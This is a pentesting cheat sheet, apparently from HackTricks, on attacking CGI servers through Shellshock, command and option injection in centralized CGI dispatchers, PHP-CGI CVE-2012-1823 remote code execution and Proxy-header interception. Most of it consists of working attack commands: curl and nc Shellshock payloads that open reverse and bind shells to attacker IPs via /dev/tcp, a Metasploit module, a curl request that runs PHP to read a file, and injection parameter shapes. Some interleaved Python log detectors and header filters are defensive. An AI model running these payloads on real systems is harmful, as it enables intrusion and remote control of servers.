CGI Pentesting
tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Information
CGI scripts are typically Perl scripts, so if you have compromised a server that can execute .cgi scripts you can upload a Perl reverse shell (/usr/share/webshells/perl/perl-reverse-shell.pl), change the extension from .pl to .cgi, give it execute permissions (chmod +x) and access the reverse shell from the web browser to execute it.
To test for CGI vulns it is recommended to use nikto -C all (with all plugins).
ShellShock
ShellShock is a vulnerability affecting Bash, the command shell widely used on Unix-based operating systems. It targets Bash's ability to execute commands passed to it by applications. The weakness lies in the handling of environment variables, the named values that change how processes run on a machine: before the fix, Bash imported any exported variable whose value started with a function definition, and it also executed whatever commands followed the function body. Attackers can therefore exploit it by attaching malicious code to an environment variable that is executed as soon as Bash receives that variable, which lets them compromise the system.
When this vulnerability is exploited the page may return an error.
You can spot this vulnerability by noticing that the target runs an old Apache version with cgi_mod (and a cgi folder), or by using nikto.
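Since a CGI server copies request headers straight into environment variables, the function-definition prefix "() {" in any header is the thing to look for server-side. The following detector, an added example rather than code from the page, scans constructed Apache combined-format log lines for that prefix in the User-Agent and Referer fields:

```python
import re

# "() {" with optional whitespace is the prefix old Bash used to recognise an
# exported function; any header carrying it is a Shellshock probe or payload.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Apache "combined" log format: request line, status, size, referer, user-agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def detect_shellshock(log_lines):
    """Return (client_ip, request_line, field) for every line whose
    user-agent or referer carries the "() {" function-export prefix."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than crash the scan
        for field in ("ua", "referer"):
            if SHELLSHOCK_RE.search(m.group(field)):
                hits.append((m.group("ip"), m.group("req"), field))
                break
    return hits

# Constructed sample log lines for this example (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2024:13:55:36 +0000] "GET /cgi-bin/admin.cgi HTTP/1.1" 500 0 "-" '
    '"() { :; }; echo VULNERABLE"',
    '198.51.100.7 - - [10/Oct/2024:13:55:40 +0000] "GET /index.html HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2024:13:56:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 12 '
    '"() {:;}; /bin/sleep 5" "curl/7.68.0"',
]

if __name__ == "__main__":
    for ip, req, field in detect_shellshock(SAMPLE_LOG):
        print(f"{ip} {req} (payload in {field})")
```

The same regex applied to a web application firewall's header inspection catches the reflected, blind and out-of-band variants listed below alike, since all of them share the prefix.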
Test
Most tests rely on echoing something and expecting that string to come back in the web response. If you think a page may be vulnerable, search for all the cgi pages and test them.
Nmap
nmap 10.2.1.31 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
Curl (reflected, blind and out-of-band)
# Reflected
curl -H 'User-Agent: () { :; }; echo "VULNERABLE TO SHELLSHOCK"' http://10.1.2.32/cgi-bin/admin.cgi 2>/dev/null| grep 'VULNERABLE'
# Blind with sleep (you could also make a ping or web request to yourself and monitor that with tcpdump)
curl -H 'User-Agent: () { :; }; /bin/bash -c "sleep 5"' http://10.11.2.12/cgi-bin/admin.cgi
# Out-Of-Band Use Cookie as alternative to User-Agent
curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http://10.10.10.10/cgi-bin/user.sh
python shellshocker.py http://10.11.1.71/cgi-bin/admin.cgi
Exploit
#Bind Shell
$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 8
#Reverse shell
$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.159.1 443 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 80
#Reverse shell using curl
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' http://10.1.2.11/cgi-bin/admin.cgi
#Reverse shell using metasploit
> use multi/http/apache_mod_cgi_bash_env_exec
> set targeturi /cgi-bin/admin.cgi
> set rhosts 10.1.2.11
> run
Centralized CGI dispatchers (single endpoint routing via selector parameters)
Many embedded web UIs multiplex many privileged actions behind a single CGI endpoint (for example, /cgi-bin/cstecgi.cgi) and use a selector parameter such as topicurl=<handler> to route the request to an internal function.
Techniques for abusing these routers:
- Enumerate handler names: scrape JS/HTML, brute-force with wordlists, or unpack the firmware and grep for the handler strings used by the dispatcher.
- Test unauthenticated reachability: some handlers forget auth checks and can be called directly.
- Target handlers that call system utilities or touch files; weak validators often block only a few characters and may miss a leading hyphen (-).
Generic exploit shapes:
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded
# 1) Option/flag injection (no shell metacharacters): flip argv of downstream tools
topicurl=<handler>&param=-n
# 2) Parameter-to-shell injection (classic RCE) when a handler concatenates into a shell
topicurl=setEasyMeshAgentCfg&agentName=;id;
# 3) Validator bypass → arbitrary file write in file-touching handlers
topicurl=setWizardCfg&<crafted_fields>=/etc/init.d/S99rc
Detection and hardening:
- Monitor unauthenticated requests to centralized CGI endpoints where topicurl is set to a sensitive handler.
- Flag parameter values that begin with - (argv option injection attempts).
- Vendors: enforce authentication on every state-changing handler, validate with strict allowlists/types/lengths, and never pass user-controlled strings as command-line flags.
Old PHP + CGI = RCE (CVE-2012-1823, CVE-2012-2311)
Basically, if cgi is active and php is "old" (<5.3.12 / < 5.4.2) you can execute code.
To exploit this vulnerability you need to access some PHP file of the web server without sending parameters (especially without sending the "=" character).
Then, to test this vulnerability, you could access for example /index.php?-s (note the -s) and the source code of the application will appear in the response.
Then, to obtain RCE you can send this special query: /?-d allow_url_include=1 -d auto_prepend_file=php://input with the PHP code to execute in the body of the request. Example:
curl -i --data-binary "<?php system(\"cat /flag.txt \") ?>" "http://jh2i.com:50008/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input"
More info about the vuln and possible exploits: https://www.zero-day.cz/database/337/, cve-2012-1823, cve-2012-2311, CTF Writeup Example.
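The reason the "=" character matters is the CGI rule for "indexed" queries: when the query string contains no unencoded "=", the server splits it on "+", URL-decodes each word and passes the words to the script as command-line arguments, which an unpatched php-cgi then parsed as its own options. The following added example (not from the page or from PHP itself) reproduces that mapping for the page's own queries and gives a detection check equivalent to the classic mod_rewrite mitigation:

```python
from urllib.parse import unquote

# php-cgi options the CVE-2012-1823 attack shape relies on: -s dumps the
# script source, -d sets an ini directive (e.g. auto_prepend_file=php://input),
# -n/-c/-f change which php.ini or script file is used.
RISKY_OPTS = {"-s", "-d", "-n", "-c", "-f"}

def cgi_argv_from_query(query):
    """RFC 3875 section 4.4 'indexed query' handling: a query string with no
    unencoded '=' is split on '+' and URL-decoded into argv words. This is
    why the attack must avoid a literal '=' and encodes it as %3d instead."""
    if "=" in query:
        return []
    return [unquote(word) for word in query.split("+") if word]

def php_cgi_injected_options(query):
    """Return (option, argument) pairs an unpatched php-cgi would parse from
    this query; an empty list means the request lacks the attack shape."""
    argv = cgi_argv_from_query(query)
    found = []
    i = 0
    while i < len(argv):
        word = argv[i]
        if word in ("-d", "-c", "-f") and i + 1 < len(argv):
            found.append((word, argv[i + 1]))
            i += 2
            continue
        if word.startswith("-d") and len(word) > 2:  # attached form: -dfoo=bar
            found.append(("-d", word[2:]))
        elif word in RISKY_OPTS:
            found.append((word, None))
        i += 1
    return found

def is_php_cgi_attack(query):
    """Coarse check mirroring the usual mod_rewrite workaround: no '=' in the
    raw query string, but a (possibly %2d-encoded) '-' is present."""
    return "=" not in query and "-" in unquote(query)

# Constructed sample queries: the page's RCE query, the -s source leak,
# a percent-encoded variant, and a harmless keyed query.
SAMPLES = [
    "-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input",
    "-s",
    "%2ds",
    "page=1&id=2",
]
```

Logging the output of php_cgi_injected_options for every request to a php-cgi handler gives a precise alert, while is_php_cgi_attack is the cheap filter to put in front of a server that cannot be upgraded.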
Proxy (MitM to Web server requests)
CGI creates an environment variable for each header in the http request. For example: "host:web.com" is created as "HTTP_HOST"="web.com".
Since the HTTP_PROXY variable could be used by the web server, try sending a header containing: "Proxy: <IP_attacker>:<PORT>" and if the server performs any request during the session, you will be able to capture every request made by the server.
References
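The header-to-variable mapping above, with the mitigation that servers adopted: never export the client-supplied Proxy header as HTTP_PROXY. This is an added example, not code from the page or from any web server; the sample headers are constructed.

```python
def cgi_env_from_headers(headers, drop_headers=("Proxy",)):
    """Build the CGI meta-variables a server derives from request headers
    (RFC 3875 section 4.1.18): 'HTTP_' + upper-cased name, '-' replaced by '_'.
    Headers named in drop_headers are never exported, so a client-supplied
    'Proxy:' header can no longer become HTTP_PROXY for the script's HTTP
    client libraries to honour."""
    env = {}
    blocked = {h.lower() for h in drop_headers}
    for name, value in headers:
        if name.lower() in blocked:
            continue
        env["HTTP_" + name.upper().replace("-", "_")] = value.strip()
    return env

def find_proxy_injection(headers):
    """Return the value of every incoming Proxy header, for logging or alerting:
    browsers never send this header, so any occurrence is worth a look."""
    return [v.strip() for n, v in headers if n.lower() == "proxy"]

# Constructed request headers for this example (the Proxy value is a placeholder).
SAMPLE_HEADERS = [
    ("Host", "web.com"),
    ("User-Agent", "curl/8.0"),
    ("Proxy", "203.0.113.10:8080"),
]
```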